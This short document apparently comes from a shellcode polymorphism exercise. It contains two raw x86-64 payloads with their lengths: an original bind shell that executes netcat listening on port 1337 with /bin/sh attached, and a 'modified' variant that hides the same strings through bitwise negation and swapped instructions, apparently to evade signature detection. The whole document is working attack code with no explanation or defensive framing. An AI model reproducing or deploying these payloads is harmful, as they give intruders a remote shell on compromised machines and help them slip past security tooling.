

original shellcode :
"\x48\x31\xd2\x48\xbf\xff\x2f\x62\x69\x6e\x2f\x6e\x63\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb9\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xe9\x08\x51\x48\x89\xe1\x48\xbb\xff\xff\xff\xff\xff\xff\x2d\x65\x48\xc1\xeb\x30\x53\x48\x89\xe3\x49\xba\xff\xff\xff\xff\x31\x33\x33\x37\x49\xc1\xea\x20\x41\x52\x49\x89\xe2\x49\xb9\xff\xff\xff\xff\xff\xff\x2d\x70\x49\xc1\xe9\x30\x41\x51\x49\x89\xe1\x49\xb8\xff\xff\xff\xff\xff\xff\x2d\x6c\x49\xc1\xe8\x30\x41\x50\x49\x89\xe0\x52\x51\x53\x41\x52\x41\x51\x41\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05";


len = 131


modified shellcode :
"\x4d\x31\xf6\x49\x83\xc6\x36\x89\xc0\x29\xc0\x48\x89\xc2\x52\x48\xbb\xd0\x9d\x96\x91\xd0\xd0\x91\x9c\x48\xf7\xd3\x53\x54\x5f\x48\xb9\x33\xd0\x9d\x96\x91\xd0\x8c\x97\x80\xe9\x21\x48\xf7\xd1\x48\xc1\xe9\x08\x51\x54\x59\x66\x52\x66\x05\xdf\x01\x49\x0f\xaf\xc6\x66\x83\xc0\x23\x66\x50\x54\x5b\x66\x52\x68\x31\x33\x33\x37\x54\x41\x5d\x66\x52\x66\x68\x2d\x70\x54\x41\x5c\x66\x52\x66\x68\x2d\x6c\x54\x41\x5b\x4d\x31\xc9\x66\x41\xb9\x0f\x05\x52\x51\x53\x41\x55\x41\x54\x41\x53\x57\x54\x5e\x48\x31\xc0\x04\x3b\x41\x51\x54\x41\x59\x41\xff\xd1";


len = 133
